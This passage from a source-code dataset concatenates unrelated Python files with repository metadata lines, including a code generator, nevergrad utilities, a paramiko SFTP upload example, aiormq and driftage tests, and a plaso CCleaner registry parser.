else:
allocate_string = ''
self.out_c.write(": (%s%s) " % (param.direction,
allocate_string))
self._write_annotation_transfer(param)
self.out_c.write(":\n")
self.out_c.write(' *\n')
self.out_c.write(' * Undocumented.')
if func.retval.type != ast.TYPE_NONE:
self.out_c.write('\n *\n')
self.out_c.write(' * Returns: ')
self._write_annotation_transfer(func.retval)
self.out_c.write('\n */')
@contextmanager
def _function(self, func):
self._write_prototype(func)
self._write_docs(func)
self._write_prelude(self.out_c, func)
self.out_c.write("\n{\n")
yield
self.out_c.write("}\n\n")
def _codegen_start(self):
warning = '/* GENERATED BY testcodegen.py; DO NOT EDIT */\n\n'
self.out_h.write(warning)
nsupper = self.namespace.name.upper()
for header in self.include_first_header:
self.out_h.write("""#include "%s"\n""" % header)
self.out_h.write("""
#ifndef __%s_H__
#define __%s_H__
#include <glib-object.h>
""" % (nsupper, nsupper))
for header in self.include_last_header:
self.out_h.write("""#include "%s"\n""" % header)
self.out_c.write(warning)
for header in self.include_first_src:
self.out_c.write("""#include "%s"\n""" % header)
src_dir = os.path.dirname(os.path.realpath(self.out_c.name))
header = os.path.relpath(self.out_h_filename, src_dir)
self.out_c.write("""#include "%s"\n\n""" % (header, ))
for header in self.include_last_src:
self.out_c.write("""#include "%s"\n""" % header)
def _codegen_end(self):
self.out_h.write("""#endif\n""")
self.out_h.close()
self.out_c.close()
def set_function_body(self, node, body):
assert isinstance(node, ast.Function)
self._function_bodies[node] = body
def codegen(self):
self.out_h = open(self.out_h_filename, 'w')
self.out_c = open(self.out_c_filename, 'w')
self._codegen_start()
for node in self.namespace.values():
if isinstance(node, ast.Function):
with self._function(node):
body = self._function_bodies.get(node)
if not body:
body = ''
self.out_c.write(body)
self._codegen_end()
| 1.867188 | 2 |
nevergrad/parametrization/utils.py | mehrdad-shokri/nevergrad | 2 | 3421 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import shutil
import tempfile
import subprocess
import typing as tp
from pathlib import Path
from nevergrad.common import tools as ngtools
class Descriptors:
"""Provides access to a set of descriptors for the parametrization
This can be used within optimizers.
""" # TODO add repr
# pylint: disable=too-many-arguments
def __init__(
self,
deterministic: bool = True,
deterministic_function: bool = True,
monoobjective: bool = True,
not_manyobjective: bool = True,
continuous: bool = True,
metrizable: bool = True,
ordered: bool = True,
) -> None:
self.deterministic = deterministic
self.deterministic_function = deterministic_function
self.continuous = continuous
self.metrizable = metrizable
self.ordered = ordered
self.monoobjective = monoobjective
self.not_manyobjective = not_manyobjective
def __and__(self, other: "Descriptors") -> "Descriptors":
values = {field: getattr(self, field) & getattr(other, field) for field in self.__dict__}
return Descriptors(**values)
def __repr__(self) -> str:
diff = ",".join(f"{x}={y}" for x, y in sorted(ngtools.different_from_defaults(instance=self, check_mismatches=True).items()))
return f"{self.__class__.__name__}({diff})"
class NotSupportedError(RuntimeError):
"""This type of operation is not supported by the parameter.
"""
class TemporaryDirectoryCopy(tempfile.TemporaryDirectory): # type: ignore
"""Creates a full copy of a directory inside a temporary directory
This class can be used as TemporaryDirectory but:
- the created copy path is available through the copyname attribute
- the contextmanager returns the clean copy path
- the directory where the temporary directory will be created
can be controlled through the CLEAN_COPY_DIRECTORY environment
variable
"""
key = "CLEAN_COPY_DIRECTORY"
@classmethod
def set_clean_copy_environment_variable(cls, directory: tp.Union[Path, str]) -> None:
"""Sets the CLEAN_COPY_DIRECTORY environment variable in
order for subsequent calls to use this directory as base for the
copies.
"""
assert Path(directory).exists(), "Directory does not exist"
os.environ[cls.key] = str(directory)
# pylint: disable=redefined-builtin
def __init__(self, source: tp.Union[Path, str], dir: tp.Optional[tp.Union[Path, str]] = None) -> None:
if dir is None:
dir = os.environ.get(self.key, None)
super().__init__(prefix="tmp_clean_copy_", dir=dir)
self.copyname = Path(self.name) / Path(source).name
shutil.copytree(str(source), str(self.copyname))
def __enter__(self) -> Path:
super().__enter__()
return self.copyname
class FailedJobError(RuntimeError):
"""Job failed during processing
"""
class CommandFunction:
"""Wraps a command as a function in order to make sure it goes through the
pipeline and notify when it is finished.
The output is a string containing everything that has been sent to stdout
Parameters
----------
command: list
command to run, as a list
verbose: bool
prints the command and stdout at runtime
cwd: Path/str
path to the location where the command must run from
Returns
-------
str
Everything that has been sent to stdout
"""
def __init__(self, command: tp.List[str], verbose: bool = False, cwd: tp.Optional[tp.Union[str, Path]] = None,
env: tp.Optional[tp.Dict[str, str]] = None) -> None:
if not isinstance(command, list):
raise TypeError("The command must be provided as a list")
self.command = command
self.verbose = verbose
self.cwd = None if cwd is None else str(cwd)
self.env = env
def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> str:
"""Call the cammand line with addidional arguments
The keyword arguments will be sent as --{key}={val}
The logs are bufferized. They will be printed if the job fails, or sent as output of the function
Errors are provided with the internal stderr
"""
# TODO make the following command more robust (probably fails in multiple cases)
full_command = self.command + [str(x) for x in args] + ["--{}={}".format(x, y) for x, y in kwargs.items()]
if self.verbose:
print(f"The following command is sent: {full_command}")
outlines: tp.List[str] = []
with subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=False, cwd=self.cwd, env=self.env) as process:
try:
assert process.stdout is not None
for line in iter(process.stdout.readline, b''):
if not line:
break
outlines.append(line.decode().strip())
if self.verbose:
print(outlines[-1], flush=True)
except Exception: # pylint: disable=broad-except
process.kill()
process.wait()
raise FailedJobError("Job got killed for an unknown reason.")
stderr = process.communicate()[1] # we already got stdout
stdout = "\n".join(outlines)
retcode = process.poll()
if stderr and (retcode or self.verbose):
print(stderr.decode(), file=sys.stderr)
if retcode:
subprocess_error = subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr)
raise FailedJobError(stderr.decode()) from subprocess_error
return stdout
| 2.28125 | 2 |
Section 20/2.Document-transfer_files.py | airbornum/-Complete-Python-Scripting-for-Automation | 18 | 3422 | <gh_stars>10-100
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname='172.16.58.3',username='ec2-user',password='<PASSWORD>',port=22)
sftp_client=ssh.open_sftp()
#sftp_client.get('/home/ec2-user/paramiko_download.txt','paramiko_downloaded_file.txt')
#sftp_client.chdir("/home/ec2-user")
#print(sftp_client.getcwd())
#sftp_client.get('demo.txt','C:\\Users\\Automation\\Desktop\\download_file.txt')
sftp_client.put("transfer_files.py",'/home/ec2-user/transfer_files.py')
sftp_client.close()
ssh.close() | 2.328125 | 2 |
nimlime_core/utils/internal_tools.py | gmpreussner/Varriount.NimLime | 0 | 3423 | # coding=utf-8
"""
Internal tools for NimLime development & testing.
"""
from pprint import pprint
import sublime
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from functools import wraps
from pstats import Stats
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
debug_on = False
if debug_on:
sublime.message_dialog("NimLime running in debug mode.")
# Debug printer
def print_debug(*args, **kwargs):
"""
Print when debugging.
:type args: Any
:type kwargs: Any
"""
if debug_on:
pprint(*args, **kwargs)
# Profiling functions
profiler = Profile()
profiler_running = False
def profile_func(func):
"""
Decorator which profiles a single function.
Call print_profile_data to print the collected data.
:type func: Callable
:rtype: Callable
"""
@wraps(func)
def _profile_wrapper(*args, **kwargs):
global profiler_running
if not profiler_running:
profiler_running = True
try:
profiler.enable()
return func(*args, **kwargs)
finally:
profiler.disable()
profiler_running = False
return _profile_wrapper
def print_profile_data():
"""
Print the collected profile data.
"""
stream = StringIO()
statistics = Stats(profiler, stream=stream)
statistics.sort_stats('cumulative')
statistics.print_stats()
print(stream.getvalue())
| 1.96875 | 2 |
test/unit/test_monitor.py | dmvieira/driftage | 4 | 3424 | import orjson
from asynctest import TestCase, Mock, patch
from freezegun import freeze_time
from driftage.monitor import Monitor
class TestMonitor(TestCase):
def setUp(self):
self.monitor = Monitor(
"user_test@local", "<PASSWORD>", "identif"
)
def tearDown(self):
self.monitor.container.stop()
def test_should_set_identifier_or_agent_name(self):
self.assertEqual(
self.monitor._identifier,
"identif"
)
monitor = Monitor(
"user_test2@local", "<PASSWORD>"
)
self.assertEqual(
monitor._identifier,
"user_test2"
)
monitor.container.stop()
@patch("driftage.monitor.WaitMonitorSubscriptions")
async def test_should_add_subscription_behaviour(self, behaviour_mock):
self.monitor.add_behaviour = Mock()
await self.monitor.setup()
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock()
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor.collect({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data_with_call(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
| 2.328125 | 2 |
examples/todo_advanced/main.py | travisluong/fastarg | 1 | 3425 | <filename>examples/todo_advanced/main.py
import fastarg
import commands.todo as todo
import commands.user as user
app = fastarg.Fastarg(description="productivity app", prog="todo")
@app.command()
def hello_world(name: str):
"""hello world"""
print("hello " + name)
app.add_fastarg(todo.app, name="todo")
app.add_fastarg(user.app, name="user")
if __name__ == "__main__":
app.run() | 2.546875 | 3 |
tests/test_channel.py | rwilhelm/aiormq | 176 | 3426 | import asyncio
import uuid
import pytest
from aiomisc_pytest.pytest_plugin import TCPProxy
import aiormq
async def test_simple(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"foo",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b"foo"
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
async def test_blank_body(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b""
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
@pytest.mark.no_catch_loop_exceptions
async def test_bad_consumer(amqp_channel: aiormq.Channel, loop):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare()
future = loop.create_future()
await channel.basic_publish(b"urgent", routing_key=declare_ok.queue)
consumer_tag = loop.create_future()
async def bad_consumer(message):
await channel.basic_cancel(await consumer_tag)
future.set_result(message)
raise Exception
consume_ok = await channel.basic_consume(
declare_ok.queue, bad_consumer, no_ack=False,
)
consumer_tag.set_result(consume_ok.consumer_tag)
message = await future
await channel.basic_reject(message.delivery.delivery_tag, requeue=True)
assert message.body == b"urgent"
future = loop.create_future()
await channel.basic_consume(
declare_ok.queue, future.set_result, no_ack=True,
)
message = await future
assert message.body == b"urgent"
async def test_ack_nack_reject(amqp_channel: aiormq.Channel):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare(auto_delete=True)
queue = asyncio.Queue()
await channel.basic_consume(declare_ok.queue, queue.put, no_ack=False)
await channel.basic_publish(b"rejected", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"rejected"
await channel.basic_reject(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"nacked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"nacked"
await channel.basic_nack(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"acked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"acked"
await channel.basic_ack(message.delivery.delivery_tag)
async def test_confirm_multiple(amqp_channel: aiormq.Channel):
"""
RabbitMQ has been observed to send confirmations in a strange pattern
when publishing simultaneously where only some messages are delivered
to a queue. It sends acks like this 1 2 4 5(multiple, confirming also 3).
This test is probably inconsequential without publisher_confirms
This is a regression for https://github.com/mosquito/aiormq/issues/10
"""
channel = amqp_channel # type: aiormq.Channel
exchange = uuid.uuid4().hex
await channel.exchange_declare(exchange, exchange_type="topic")
try:
declare_ok = await channel.queue_declare(exclusive=True)
await channel.queue_bind(
declare_ok.queue, exchange, routing_key="test.5",
)
for i in range(10):
messages = [
asyncio.ensure_future(channel.basic_publish(
b"test", exchange=exchange, routing_key="test.{}".format(i),
))
for i in range(10)
]
_, pending = await asyncio.wait(messages, timeout=0.2)
assert not pending, "not all publishes were completed (confirmed)"
await asyncio.sleep(0.05)
finally:
await channel.exchange_delete(exchange)
async def test_exclusive_queue_locked(amqp_connection):
channel0 = await amqp_connection.channel()
channel1 = await amqp_connection.channel()
qname = str(uuid.uuid4())
await channel0.queue_declare(qname, exclusive=True)
try:
await channel0.basic_consume(qname, print, exclusive=True)
with pytest.raises(aiormq.exceptions.ChannelLockedResource):
await channel1.queue_declare(qname)
await channel1.basic_consume(qname, print, exclusive=True)
finally:
await channel0.queue_delete(qname)
async def test_remove_writer_when_closed(amqp_channel: aiormq.Channel):
with pytest.raises(aiormq.exceptions.ChannelClosed):
await amqp_channel.queue_declare(
"amq.forbidden_queue_name", auto_delete=True,
)
with pytest.raises(aiormq.exceptions.ChannelInvalidStateError):
await amqp_channel.queue_delete("amq.forbidden_queue_name")
async def test_proxy_connection(proxy_connection, proxy: TCPProxy):
channel = await proxy_connection.channel() # type: aiormq.Channel
await channel.queue_declare(auto_delete=True)
async def test_declare_queue_timeout(proxy_connection, proxy: TCPProxy):
for _ in range(3):
channel = await proxy_connection.channel() # type: aiormq.Channel
qname = str(uuid.uuid4())
with proxy.slowdown(read_delay=5, write_delay=0):
with pytest.raises(asyncio.TimeoutError):
await channel.queue_declare(
qname, auto_delete=True, timeout=0.5
)
| 2.0625 | 2 |
nitro-python/nssrc/com/citrix/netscaler/nitro/resource/stat/mediaclassification/__init__.py | culbertm/NSttyPython | 2 | 3427 | __all__ = ['mediaclassification_stats'] | 1.09375 | 1 |
balanced_parens.py | joeghodsi/interview-questions | 1 | 3428 | '''
Problem description:
Given a string, determine whether or not the parentheses are balanced
'''
def balanced_parens(str):
'''
runtime: O(n)
space : O(1)
'''
if str is None:
return True
open_count = 0
for char in str:
if char == '(':
open_count += 1
elif char == ')':
open_count -= 1
if open_count < 0:
return False
return open_count == 0
| 3.96875 | 4 |
plaso/parsers/winreg_plugins/ccleaner.py | pyllyukko/plaso | 1,253 | 3429 | # -*- coding: utf-8 -*-
"""Parser for the CCleaner Registry key."""
import re
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import winreg_parser
from plaso.parsers.winreg_plugins import interface
class CCleanerConfigurationEventData(events.EventData):
"""CCleaner configuration event data.
Attributes:
configuration (str): CCleaner configuration.
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:configuration'
def __init__(self):
"""Initializes event data."""
super(CCleanerConfigurationEventData, self).__init__(
data_type=self.DATA_TYPE)
self.configuration = None
self.key_path = None
class CCleanerUpdateEventData(events.EventData):
"""CCleaner update event data.
Attributes:
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:update'
def __init__(self):
"""Initializes event data."""
super(CCleanerUpdateEventData, self).__init__(data_type=self.DATA_TYPE)
self.key_path = None
class CCleanerPlugin(interface.WindowsRegistryPlugin):
"""Gathers the CCleaner Keys for NTUSER hive.
Known Windows Registry values within the CCleaner key:
* (App)Cookies [REG_SZ], contains "True" if the cookies should be cleaned;
* (App)Delete Index.dat files [REG_SZ]
* (App)History [REG_SZ]
* (App)Last Download Location [REG_SZ]
* (App)Other Explorer MRUs [REG_SZ]
* (App)Recent Documents [REG_SZ]
* (App)Recently Typed URLs [REG_SZ]
* (App)Run (in Start Menu) [REG_SZ]
* (App)Temporary Internet Files [REG_SZ]
* (App)Thumbnail Cache [REG_SZ]
* CookiesToSave [REG_SZ]
* UpdateKey [REG_SZ], contains a date and time formatted as:
"MM/DD/YYYY hh:mm:ss [A|P]M", for example "07/13/2013 10:03:14 AM";
* WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels;
* WINDOW_LEFT [REG_SZ]
* WINDOW_MAX [REG_SZ]
* WINDOW_TOP [REG_SZ]
* WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels;
Also see:
http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html
"""
NAME = 'ccleaner'
DATA_FORMAT = 'CCleaner Registry data'
FILTERS = frozenset([
interface.WindowsRegistryKeyPathFilter(
'HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner')])
# Date and time string formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M"
# for example "07/13/2013 10:03:14 AM"
# TODO: determine if this is true for other locales.
_UPDATE_DATE_TIME_RE = re.compile(
r'([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) '
r'([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)')
def _ParseUpdateKeyValue(self, parser_mediator, registry_value):
"""Parses the UpdateKey value.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_value (dfwinreg.WinRegistryValue): Windows Registry value.
Returns:
dfdatetime_time_elements.TimeElements: date and time value or None
if not available.
"""
if not registry_value.DataIsString():
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data type: {0:s}'.format(
registry_value.data_type_string))
return None
date_time_string = registry_value.GetDataAsObject()
if not date_time_string:
parser_mediator.ProduceExtractionWarning('missing UpdateKey value data')
return None
re_match = self._UPDATE_DATE_TIME_RE.match(date_time_string)
if not re_match:
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data: {0!s}'.format(date_time_string))
return None
month, day_of_month, year, hours, minutes, seconds, part_of_day = (
re_match.groups())
try:
year = int(year, 10)
month = int(month, 10)
day_of_month = int(day_of_month, 10)
hours = int(hours, 10)
minutes = int(minutes, 10)
seconds = int(seconds, 10)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(date_time_string))
return None
if part_of_day == 'PM':
hours += 12
time_elements_tuple = (year, month, day_of_month, hours, minutes, seconds)
try:
date_time = dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
date_time.is_local_time = True
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(
time_elements_tuple))
return None
return date_time
def ExtractEvents(self, parser_mediator, registry_key, **kwargs):
"""Extracts events from a Windows Registry key.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_key (dfwinreg.WinRegistryKey): Windows Registry key.
"""
configuration = []
date_time = None
for registry_value in registry_key.GetValues():
if not registry_value.name or not registry_value.data:
continue
if registry_value.name == 'UpdateKey':
date_time = self._ParseUpdateKeyValue(parser_mediator, registry_value)
else:
value = registry_value.GetDataAsObject()
configuration.append('{0:s}: {1!s}'.format(registry_value.name, value))
if date_time:
event_data = CCleanerUpdateEventData()
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_UPDATE,
time_zone=parser_mediator.timezone)
parser_mediator.ProduceEventWithEventData(event, event_data)
event_data = CCleanerConfigurationEventData()
event_data.configuration = ' '.join(sorted(configuration)) or None
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
registry_key.last_written_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
winreg_parser.WinRegistryParser.RegisterPlugin(CCleanerPlugin)
| 2.21875 | 2 |
pushpluck/base.py | ejconlon/pushpluck | 0 | 3430 | <reponame>ejconlon/pushpluck
from abc import ABCMeta, abstractmethod
from dataclasses import dataclass
from typing import Any, TypeVar
X = TypeVar('X')
class Closeable(metaclass=ABCMeta):
@abstractmethod
def close(self) -> None:
""" Close this to free resources and deny further use. """
raise NotImplementedError()
class Resettable(metaclass=ABCMeta):
@abstractmethod
def reset(self) -> None:
""" Reset this to a known good state for further use. """
raise NotImplementedError()
class Void:
""" None is the type with 1 inhabitant, None. Void is the type with 0 inhabitants. """
def __init__(self) -> None:
raise Exception('Cannot instantiate Void')
def absurd(self) -> X:
"""
This allows you to trivially satisfy type checking by returning
`void.absurd()` since it's impossible for `void` to exist in the first place.
"""
raise Exception('Absurd')
@dataclass(frozen=True)
class Unit:
""" A simple type with one inhabitant (according to eq and hash). """
@staticmethod
def instance() -> 'Unit':
return _UNIT_SINGLETON
_UNIT_SINGLETON = Unit()
class MatchException(Exception):
def __init__(self, value: Any) -> None:
super().__init__(f'Failed to match value: {value}')
| 3.078125 | 3 |
test/cuberead/highres/test_default_high_res.py | CAB-LAB/cube-performance-test | 0 | 3431 | import time
import pytest
from test import config
from test.cube_utils import CubeUtils
ITERATIONS_NUM = getattr(config, 'iterations_num', 1)
ROUNDS_NUM = getattr(config, 'rounds_num', 10)
class TestDefaultHighRes:
@pytest.fixture(scope="class", autouse=True)
def cube_default(self):
cube_utils = CubeUtils()
cube_utils.generate_cube("default_high_res", 46, 2160, 4320)
yield cube_utils
# ---------------
# Read spatially
# ---------------
@pytest.mark.benchmark(
group="Cube reading for small area spatial analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_135x135(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_spatial, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
@pytest.mark.benchmark(
group="Cube reading for large area spatial analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_2160x2160(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_spatial, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
# ---------------
# Read temporally
# ---------------
@pytest.mark.benchmark(
group="Cube reading for subset temporal analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_46x135x135(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_temporal, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
@pytest.mark.benchmark(
group="Cube reading for global temporal analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_46x2160x2160(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_temporal, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
| 1.992188 | 2 |
tests/components/test_dialogue_flow.py | dyoshiha/mindmeld | 1 | 3432 | import pytest
from mindmeld.components import Conversation
def assert_reply(directives, templates, *, start_index=0, slots=None):
"""Asserts that the provided directives contain the specified reply
Args:
directives (list[dict[str, dict]]): list of directives returned by application
templates (Union[str, Set[str]]): The reply must be a member of this set.
start_index (int, optional): The index of the first client action associated
with this reply.
slots (dict, optional): The slots to fill the templates
"""
slots = slots or {}
if isinstance(templates, str):
templates = [templates]
texts = set(map(lambda x: x.format(**slots), templates))
assert len(directives) >= start_index + 1
assert directives[start_index]['name'] == 'reply'
assert directives[start_index]['payload']['text'] in texts
def assert_target_dialogue_state(convo, target_dialogue_state):
assert convo.params.target_dialogue_state == target_dialogue_state
@pytest.mark.conversation
def test_reprocess_handler(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('are there any stores near me?').directives
assert_target_dialogue_state(convo, 'send_store_hours_flow')
assert_reply(directives,
templates="I'm not sure. You haven't told me where you are!")
@pytest.mark.conversation
def test_default_handler(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('Howdy!').directives
assert_target_dialogue_state(convo, 'send_store_hours_flow')
assert_reply(directives,
templates='Sorry, I did not get you. Which store would you like to know about?')
@pytest.mark.conversation
def test_repeated_flow(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
for i in range(2):
directives = convo.process('When does that open?').directives
assert_reply(directives, 'Which store would you like to know about?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('When does that open?').directives
assert_reply(directives, 'Sorry I cannot help you. Please try again.')
assert_target_dialogue_state(convo, None)
@pytest.mark.conversation
def test_intent_handler_and_exit_flow(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('exit').directives
assert_target_dialogue_state(convo, None)
assert_reply(directives, templates=['Bye', 'Goodbye', 'Have a nice day.'])
def assert_dialogue_state(dm, dialogue_state):
for rule in dm.rules:
if rule.dialogue_state == dialogue_state:
return True
return False
def test_dialogue_flow_async(async_kwik_e_mart_app):
@async_kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent')
async def some_handler(context, responder):
pass
assert some_handler.flow_state == 'some_handler_flow'
assert 'some_handler' in some_handler.all_flows
dm = some_handler.dialogue_manager
assert_dialogue_state(dm, 'some_handler')
assert_dialogue_state(dm, 'some_handler_flow')
assert len(some_handler.rules) == 0
@some_handler.handle(intent='some_intent')
async def some_flow_handler(context, responder):
pass
assert len(some_handler.rules) == 1
@some_handler.handle(intent='some_intent_2', exit_flow=True)
async def some_flow_handler_2(context, responder):
pass
assert len(some_handler.rules) == 2
assert 'some_flow_handler_2' in some_handler.exit_flow_states
def test_dialogue_flow(kwik_e_mart_app):
@kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent')
def some_handler(context, responder):
pass
assert some_handler.flow_state == 'some_handler_flow'
assert 'some_handler' in some_handler.all_flows
dm = some_handler.dialogue_manager
assert_dialogue_state(dm, 'some_handler')
assert_dialogue_state(dm, 'some_handler_flow')
assert len(some_handler.rules) == 0
@some_handler.handle(intent='some_intent')
def some_flow_handler(context, responder):
pass
assert len(some_handler.rules) == 1
@some_handler.handle(intent='some_intent_2', exit_flow=True)
def some_flow_handler_2(context, responder):
pass
assert len(some_handler.rules) == 2
assert 'some_flow_handler_2' in some_handler.exit_flow_states
| 2.34375 | 2 |
mine/src/main/python/SVM.py | nextzlog/mine | 3 | 3433 | import os,sys
import webbrowser
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.cm as cm
import matplotlib.pylab as plt
from matplotlib import ticker
plt.rcParams['font.family'] = 'monospace'
fig = plt.figure()
rect = fig.add_subplot(111, aspect='equal')
data0 = np.loadtxt('data0.dat', delimiter=',')
data1 = np.loadtxt('data1.dat', delimiter=',')
dense = np.loadtxt('dense.dat', delimiter=',')
ID = sys.argv[1]
X = np.arange(-2.0, 2.05, 0.05)
Y = np.arange(-2.0, 2.05, 0.05)
Xm, Ym = np.meshgrid(X, Y)
vmin, vmax = dense.min(), dense.max()
if vmin * vmax < 0:
vmin = -abs(max(-vmin, vmax))
vmax = +abs(max(-vmin, vmax))
cr = rect.imshow(dense.reshape((len(Y), len(X))), extent=(X[0], X[-1], Y[0], Y[-1]), vmin=vmin, vmax=vmax, cmap=cm.coolwarm, origin='lower')
plt.contour(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed', linewidths=[2,2])
plt.contour(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed', linewidths=[2])
